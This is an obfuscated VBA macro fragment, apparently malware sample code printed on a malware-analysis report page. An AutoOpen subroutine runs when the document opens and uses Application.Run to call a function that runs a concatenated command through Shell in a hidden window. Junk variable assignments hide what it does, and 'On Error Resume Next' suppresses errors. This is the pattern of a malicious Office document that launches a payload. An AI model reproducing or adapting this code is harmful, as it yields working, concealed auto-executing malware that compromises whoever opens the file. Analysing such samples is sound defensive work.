HbiLiU = CDate(32119)
WKHmKF = sCzwo
TjKaf = 26476
jFPnb = 90596
pVumBFjXmdo = UArrs + kDXVUvWH + wUDzFVOAv + tvFVBjk + QlwpZSNnCq + jFkCK
ZUZkUz = CDate(QodlnU + Sin(12117 + 10195) * 59262 * CInt(9385))
nXuLva = CByte(JJnml)
PRBZb = CDate(85148)
tzYwGz = JZtpUE
JGWiBX = 70511
ftUTwJ = 82643
End Function
Function LPPUZa(ulUGGiLqhPb)
On Error Resume Next
ljuvzz = CDate(bazpsV + Sin(66674 + 4577) * 44394 * CInt(33655))
Kmzni = CByte(SdNZvL)
ibUYLH = CDate(52162)
karFZO = VPPzHr
wrUfCz = 32855
pSYGCr = 70318
KvVZH = CDate(ppRzHN + Sin(30650 + 29297) * 82630 * CInt(4301))
ZzGTX = CByte(tjGjP)
jRbSFw = CDate(4624)
YUpYr = VbILUZ
lBnbGS = 9929
WIQCq = 55975
jzXGhi = IboOdBIi + Shell(dGWzuwS + ulUGGiLqhPb + nlPnWb, 96108 - 96108)
zwNZNZ = CDate(MliVc + Sin(82545 + 92193) * 49188 * CInt(91775))
CMUaZ = CByte(hiMdS)
zzzcUQ = CDate(93024)
uzDoiD = YhcjM
jLiLDP = 17159
qnShZ = 10405
End Function
Sub AutoOpen()
On Error Resume Next
KJWUww = CDate(zFUlUP + Sin(66991 + 53639) * 47752 * CInt(20747))
pFDYD = CByte(aQsmVt)
BjwkAf = CDate(75555)
UQWZu = LKufD
vMAwUs = 66665
TNvbi = 91456
Application.Run tuLpbcnD + "LPPUZa" + izCXbEOTVF, czXOnj + pVumBFjXmdo + TwSkmA
ZoDjr = CDate(CfZGm + Sin(54667 + 39009) * 75070 * CInt(71474))
YYSEYZ = CByte(LWKkOS)
mBCwr = CDate(1037)
afncBY = ujPvU
EGprQn = 35020
pUvRLz = 69587
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.